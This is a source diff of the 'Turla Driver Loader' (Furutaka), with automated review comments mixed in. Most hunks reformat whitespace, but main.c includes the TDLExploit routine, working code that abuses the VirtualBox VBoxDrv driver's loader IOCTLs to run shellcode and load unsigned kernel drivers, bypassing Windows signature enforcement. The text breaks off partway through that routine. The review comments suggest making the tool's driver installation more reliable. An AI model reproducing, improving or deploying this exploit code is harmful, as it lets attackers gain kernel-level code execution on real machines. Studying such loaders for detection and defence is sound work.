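Review bot: `cuiPrintTextW` is only correct in a UNICODE build, because its body uses the TCHAR-generic forms `_strcat(Buffer, TEXT("\r\n"))` and `WriteConsole(...)` while its sibling `cuiPrintTextA` correctly hard-codes `"\r\n"` and `WriteConsoleA`; in an ANSI build the W variant would hand a wide buffer to `WriteConsoleA`. The two lines should read `if (UseReturn) _strcat(Buffer, L"\r\n");` and `WriteConsoleW(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);`. Both variants also discard the `WriteConsoleA`/`WriteConsoleW`/`WriteFile` result and never read `bytesIO`, so a failed or short write to a redirected log is silent; if that is intended, a one-line comment such as `// best effort: output failures are deliberately ignored` above the write would make it explicit.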
diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h
index c6cf4d0..b15eb0d 100644
--- a/Source/Furutaka/global.h
+++ b/Source/Furutaka/global.h
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-* (C) COPYRIGHT AUTHORS, 2016
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
 *
 * TITLE: GLOBAL.H
 *
-* VERSION: 1.00
+* VERSION: 1.10
 *
-* DATE: 01 Feb 2016
+* DATE: 17 Apr 2017
 *
 * Common header file for the program support routines.
 *
diff --git a/Source/Furutaka/instdrv.c b/Source/Furutaka/instdrv.c
index 5d53482..16c29bb 100644
--- a/Source/Furutaka/instdrv.c
+++ b/Source/Furutaka/instdrv.c
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon
+* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
 *
 * TITLE: INSTDRV.C
 *
-* VERSION: 1.11
+* VERSION: 1.10
 *
-* DATE: 01 Feb 2016
+* DATE: 17 Apr 2017
 *
 * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -25,33 +25,33 @@ * */ BOOL scmInstallDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe +) { - SC_HANDLE schService; + SC_HANDLE schService; - schService = CreateService(SchSCManager, // SCManager database - DriverName, // name of service - DriverName, // name to display - SERVICE_ALL_ACCESS, // desired access - SERVICE_KERNEL_DRIVER, // service type - SERVICE_DEMAND_START, // start type - SERVICE_ERROR_NORMAL, // error control type - ServiceExe, // service's binary - NULL, // no load ordering group - NULL, // no tag identifier - NULL, // no dependencies - NULL, // LocalSystem account - NULL // no password - ); - if (schService == NULL) { - return FALSE; - } + schService = CreateService(SchSCManager, // SCManager database + DriverName, // name of service + DriverName, // name to display + SERVICE_ALL_ACCESS, // desired access + SERVICE_KERNEL_DRIVER, // service type + SERVICE_DEMAND_START, // start type + SERVICE_ERROR_NORMAL, // error control type + ServiceExe, // service's binary + NULL, // no load ordering group + NULL, // no tag identifier + NULL, // no dependencies + NULL, // LocalSystem account + NULL // no password + ); + if (schService == NULL) { + return FALSE; + } - CloseServiceHandle(schService); - return TRUE; + CloseServiceHandle(schService); + return TRUE; } /* 
@@ -63,26 +63,26 @@ BOOL scmInstallDriver( * */ BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - SC_HANDLE schService; - BOOL ret; + SC_HANDLE schService; + BOOL ret; - schService = OpenService(SchSCManager, - DriverName, - SERVICE_ALL_ACCESS - ); - if (schService == NULL) - return FALSE; + schService = OpenService(SchSCManager, + DriverName, + SERVICE_ALL_ACCESS + ); + if (schService == NULL) + return FALSE; - ret = StartService(schService, 0, NULL) - || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; + ret = StartService(schService, 0, NULL) + || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; - CloseServiceHandle(schService); + CloseServiceHandle(schService); - return ret; + return ret; } /* @@ -94,35 +94,35 @@ BOOL scmStartDriver( * */ BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice - ) + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice +) { - TCHAR completeDeviceName[64]; - HANDLE hDevice; + TCHAR completeDeviceName[64]; + HANDLE hDevice; - RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); - wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); + RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); + wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); - hDevice = CreateFile(completeDeviceName, - GENERIC_READ | GENERIC_WRITE, - 0, - NULL, - OPEN_EXISTING, - FILE_ATTRIBUTE_NORMAL, - NULL - ); - if (hDevice == INVALID_HANDLE_VALUE) - return FALSE; + hDevice = CreateFile(completeDeviceName, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, + NULL + ); + if (hDevice == INVALID_HANDLE_VALUE) + return FALSE; - if (lphDevice) { - *lphDevice = hDevice; - } - else { - CloseHandle(hDevice); - } + if (lphDevice) { + *lphDevice = hDevice; + } + else { + CloseHandle(hDevice); + } - return TRUE; + return TRUE; } /* 
@@ -134,39 +134,39 @@ BOOL scmOpenDevice( * */ BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - INT iRetryCount; - SC_HANDLE schService; - BOOL ret; - SERVICE_STATUS serviceStatus; + BOOL ret; + INT iRetryCount; + SC_HANDLE schService; + SERVICE_STATUS serviceStatus; - ret = FALSE; - schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); - if (schService == NULL) { - return ret; - } + ret = FALSE; + schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); + if (schService == NULL) { + return ret; + } - iRetryCount = 5; - do { - SetLastError(0); + iRetryCount = 5; + do { + SetLastError(0); - ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); - if (ret == TRUE) - break; + ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); + if (ret != FALSE) + break; - if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) - break; + if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) + break; - Sleep(1000); - iRetryCount--; - } while (iRetryCount); + Sleep(1000); + iRetryCount--; + } while (iRetryCount); - CloseServiceHandle(schService); + CloseServiceHandle(schService); - return ret; + return ret; } /* @@ -178,27 +178,19 @@ BOOL scmStopDriver( * */ BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - SC_HANDLE schService; - BOOL bResult = FALSE; + SC_HANDLE schService; + BOOL bResult = FALSE; - schService = OpenService(SchSCManager, - DriverName, - DELETE - ); - - if (schService == NULL) { - return bResult; - } - - bResult = DeleteService(schService); - - CloseServiceHandle(schService); - - return bResult; + schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); + if (schService) { + bResult = DeleteService(schService); + CloseServiceHandle(schService); + } + return bResult; } /* 
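Review bot: In the @@ -178,27 +178,19 @@ hunk `scmRemoveDriver` now opens the service with `SERVICE_ALL_ACCESS` where the old code asked for `DELETE`, which is a least-privilege regression: `DeleteService` needs only `DELETE`, and requesting every right can make `OpenService` fail under a restrictive service DACL in exactly the case where the narrower request would have succeeded. The line should stay `schService = OpenService(SchSCManager, DriverName, DELETE);`. The restructuring of the function itself (single exit, handle closed inside the success branch) is fine and preserves the previous behaviour.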
@@ -210,26 +202,23 @@ BOOL scmRemoveDriver( * */ BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name - ) + _In_ LPCTSTR Name +) { - SC_HANDLE schSCManager; - BOOL bResult = FALSE; + SC_HANDLE schSCManager; + BOOL bResult = FALSE; - if (Name == NULL) { - return bResult; - } + if (Name == NULL) { + return bResult; + } - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); - if (schSCManager) { - scmStopDriver(schSCManager, Name); - bResult = scmRemoveDriver(schSCManager, Name); - CloseServiceHandle(schSCManager); - } - return bResult; + schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (schSCManager) { + scmStopDriver(schSCManager, Name); + bResult = scmRemoveDriver(schSCManager, Name); + CloseServiceHandle(schSCManager); + } + return bResult; } /* @@ -241,25 +230,25 @@ BOOL scmUnloadDeviceDriver( * */ BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_ PHANDLE lphDevice - ) + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice +) { - SC_HANDLE schSCManager; - BOOL bResult = FALSE; + SC_HANDLE schSCManager; + BOOL bResult = FALSE; - if (Name == NULL) { - return bResult; - } + if (Name == NULL) { + return bResult; + } - schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (schSCManager) { - scmRemoveDriver(schSCManager, Name); - scmInstallDriver(schSCManager, Name, Path); - scmStartDriver(schSCManager, Name); - bResult = scmOpenDevice(Name, lphDevice); - CloseServiceHandle(schSCManager); - } - return bResult; + schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (schSCManager) { + scmRemoveDriver(schSCManager, Name); + scmInstallDriver(schSCManager, Name, Path); + scmStartDriver(schSCManager, Name); + bResult = scmOpenDevice(Name, lphDevice); + CloseServiceHandle(schSCManager); + } + return bResult; } diff --git a/Source/Furutaka/instdrv.h b/Source/Furutaka/instdrv.h index 91400f2..42cf1cb 100644 --- a/Source/Furutaka/instdrv.h 
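Review bot: `scmLoadDeviceDriver` in the @@ -241,25 +230,25 @@ hunk still ignores the results of `scmInstallDriver` and `scmStartDriver`, so the only signal the caller gets is the `scmOpenDevice` outcome, and when that last step fails the freshly created service (and, if `StartService` succeeded, the loaded driver) is left registered on the machine. The install/start calls should be checked and a failed attempt should be torn down with the same stop-then-remove sequence `scmUnloadDeviceDriver` already uses; the cleanup-on-failure version of the body is below. `OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)` could likewise be narrowed to `SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE`, which is all the calls in this file need.
```c
    // … unchanged: Name == NULL guard …
    schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (schSCManager) {
        scmRemoveDriver(schSCManager, Name);
        // Only try to open the device when install and start both succeeded.
        if (scmInstallDriver(schSCManager, Name, Path) &&
            scmStartDriver(schSCManager, Name))
        {
            bResult = scmOpenDevice(Name, lphDevice);
        }
        // Do not leave a registered (and possibly running) service behind
        // when any step failed.
        if (bResult == FALSE) {
            scmStopDriver(schSCManager, Name);
            scmRemoveDriver(schSCManager, Name);
        }
        CloseServiceHandle(schSCManager);
    }
    return bResult;
```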
+++ b/Source/Furutaka/instdrv.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon +* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon * * TITLE: INSTDRV.H * * VERSION: 1.10 * -* DATE: 10 Mar 2015 +* DATE: 17 Apr 2017 * * Common header file for the program SCM usage. * @@ -16,39 +16,40 @@ * PARTICULAR PURPOSE. * *******************************************************************************/ +#pragma once BOOL scmInstallDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe +); BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice - ); + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice +); BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name - ); + _In_ LPCTSTR Name +); BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_ PHANDLE lphDevice - ); + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice +); diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c index aaad15b..c0b7c24 100644 --- a/Source/Furutaka/main.c +++ b/Source/Furutaka/main.c 
@@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 04 Feb 2016 +* DATE: 17 Apr 2017 * * Furutaka entry point. * @@ -32,7 +32,7 @@ HANDLE g_ConOut = NULL; HANDLE g_hVBox = INVALID_HANDLE_VALUE; BOOL g_ConsoleOutput = FALSE; BOOL g_VBoxInstalled = FALSE; -WCHAR BE = 0xFEFF; +WCHAR g_BE = 0xFEFF; #define VBoxDrvSvc TEXT("VBoxDrv") #define supImageName "furutaka" @@ -40,11 +40,11 @@ WCHAR BE = 0xFEFF; #define PAGE_SIZE 0x1000 #define scDataOffset 0x214 //shellcode data offset -#define T_LOADERTITLE TEXT("Turla Driver Loader v1.0 (04/02/16)") +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") -#define T_LOADERINTRO TEXT("Turla Driver Loader v1.0.0 started\r\n(c) 2016 TDL Project\r\nSupported x64 OS : 7 and above\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") /* * TDLVBoxInstalled @@ -55,23 +55,23 @@ WCHAR BE = 0xFEFF; * */ BOOL TDLVBoxInstalled( - VOID - ) + VOID +) { - BOOL bPresent = FALSE; - LRESULT lRet; - HKEY hKey = NULL; - - lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), - 0, KEY_READ, &hKey); + BOOL bPresent = FALSE; + LRESULT lRet; + HKEY hKey = NULL; - bPresent = (hKey != NULL); + lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), + 0, KEY_READ, &hKey); - if (hKey) { - RegCloseKey(hKey); - } + bPresent = (hKey != NULL); - return bPresent; + if (hKey) { + RegCloseKey(hKey); + } + + return bPresent; } /* 
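Review bot: In the @@ -55,23 +55,23 @@ hunk `TDLVBoxInstalled` stores the `RegOpenKeyEx` status in `lRet` but never reads it, deriving `bPresent` from `hKey != NULL` instead; that works only because `hKey` is pre-initialised to `NULL` and the API leaves the out handle untouched on failure, so the intent is clearer and more robust as `bPresent = (lRet == ERROR_SUCCESS);`. `RegOpenKeyEx` returns `LSTATUS` (a `LONG`), not `LRESULT`, so the declaration should be `LSTATUS lRet;`. The `hKey` close path after that is correct as written.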
@@ -83,51 +83,51 @@ BOOL TDLVBoxInstalled( * */ void TDLRelocImage( - ULONG_PTR Image, - ULONG_PTR NewImageBase - ) + ULONG_PTR Image, + ULONG_PTR NewImageBase +) { - PIMAGE_OPTIONAL_HEADER popth; - PIMAGE_BASE_RELOCATION rel; - DWORD_PTR delta; - LPWORD chains; - DWORD c, p, rsz; + PIMAGE_OPTIONAL_HEADER popth; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; - popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; - if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) - if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) - { - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + - popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; - delta = (DWORD_PTR)NewImageBase - popth->ImageBase; - c = 0; + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)NewImageBase - popth->ImageBase; + c = 0; - while (c < rsz) { - p = sizeof(IMAGE_BASE_RELOCATION); - chains = (LPWORD)((PBYTE)rel + p); + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); - while (p < rel->SizeOfBlock) { + while (p < rel->SizeOfBlock) { - switch (*chains >> 12) { - case IMAGE_REL_BASED_HIGHLOW: - *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; - break; - case IMAGE_REL_BASED_DIR64: - *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; - break; - } + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 
0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } - chains++; - p += sizeof(WORD); - } + chains++; + p += sizeof(WORD); + } - c += rel->SizeOfBlock; - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); - } - } + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } } /* @@ -139,19 +139,19 @@ void TDLRelocImage( * */ ULONG_PTR TDLGetProcAddress( - ULONG_PTR KernelBase, - ULONG_PTR KernelImage, - LPCSTR FunctionName - ) + ULONG_PTR KernelBase, + ULONG_PTR KernelImage, + LPCSTR FunctionName +) { - ANSI_STRING cStr; - ULONG_PTR pfn = 0; + ANSI_STRING cStr; + ULONG_PTR pfn = 0; - RtlInitString(&cStr, FunctionName); - if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) - return 0; + RtlInitString(&cStr, FunctionName); + if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) + return 0; - return KernelBase + (pfn - KernelImage); + return KernelBase + (pfn - KernelImage); } /* 
@@ -163,43 +163,43 @@ ULONG_PTR TDLGetProcAddress( * */ void TDLResolveKernelImport( - ULONG_PTR Image, - ULONG_PTR KernelImage, - ULONG_PTR KernelBase - ) + ULONG_PTR Image, + ULONG_PTR KernelImage, + ULONG_PTR KernelBase +) { - PIMAGE_OPTIONAL_HEADER popth; - ULONG_PTR ITableVA, *nextthunk; - PIMAGE_IMPORT_DESCRIPTOR ITable; - PIMAGE_THUNK_DATA pthunk; - PIMAGE_IMPORT_BY_NAME pname; - ULONG i; + PIMAGE_OPTIONAL_HEADER popth; + ULONG_PTR ITableVA, *nextthunk; + PIMAGE_IMPORT_DESCRIPTOR ITable; + PIMAGE_THUNK_DATA pthunk; + PIMAGE_IMPORT_BY_NAME pname; + ULONG i; - popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; - if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) - return; + if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) + return; - ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; - if (ITableVA == 0) - return; + ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (ITableVA == 0) + return; - ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); + ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); - if (ITable->OriginalFirstThunk == 0) - pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); - else - pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); + if (ITable->OriginalFirstThunk == 0) + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); + else + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); - for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { - nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); - if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { - pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); - nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); - } - else - nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); - } + for (i = 0; pthunk->u1.Function != 0; 
i++, pthunk++) { + nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); + if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { + pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); + } + else + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); + } } /* 
@@ -211,160 +211,160 @@ void TDLResolveKernelImport( * */ void TDLExploit( - LPVOID Shellcode, - ULONG CodeSize - ) + LPVOID Shellcode, + ULONG CodeSize +) { - SUPCOOKIE Cookie; - SUPLDROPEN OpenLdr; - DWORD bytesIO = 0; - RTR0PTR ImageBase = NULL; - ULONG_PTR paramOut; - PSUPLDRLOAD pLoadTask = NULL; - SUPSETVMFORFAST vmFast; - SUPLDRFREE ldrFree; - SIZE_T memIO; - WCHAR text[256]; + SUPCOOKIE Cookie; + SUPLDROPEN OpenLdr; + DWORD bytesIO = 0; + RTR0PTR ImageBase = NULL; + ULONG_PTR paramOut; + PSUPLDRLOAD pLoadTask = NULL; + SUPSETVMFORFAST vmFast; + SUPLDRFREE ldrFree; + SIZE_T memIO; + WCHAR text[256]; - while (g_hVBox != INVALID_HANDLE_VALUE) { - RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); - Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; - Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; - Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; - Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - Cookie.Hdr.rc = 0; - Cookie.u.In.u32ReqVersion = 0; - Cookie.u.In.u32MinVersion = 0x00070002; - RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); + while (g_hVBox != INVALID_HANDLE_VALUE) { + RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); + Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; + Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; + Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; + Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + Cookie.Hdr.rc = 0; + Cookie.u.In.u32ReqVersion = 0; + Cookie.u.In.u32MinVersion = 0x00070002; + RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, - &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, - SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); - break; - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, + &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, + SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call 
failed"), g_ConsoleOutput, TRUE); + break; + } - RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); - OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; - OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; - OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - OpenLdr.Hdr.rc = 0; - OpenLdr.u.In.cbImage = CodeSize; - RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); + RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); + OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; + OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; + OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + OpenLdr.Hdr.rc = 0; + OpenLdr.u.In.cbImage = CodeSize; + RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, - SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, - SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); - u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); + u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - ImageBase = OpenLdr.u.Out.pvImageBase; + ImageBase = OpenLdr.u.Out.pvImageBase; - memIO = PAGE_SIZE + CodeSize; - 
NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, - MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + memIO = PAGE_SIZE + CodeSize; + NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); - if (pLoadTask == NULL) - break; + if (pLoadTask == NULL) + break; - pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - pLoadTask->Hdr.cbIn = - (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; - pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; - pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; - pLoadTask->Hdr.rc = 0; - pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; - pLoadTask->u.In.pvImageBase = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; - 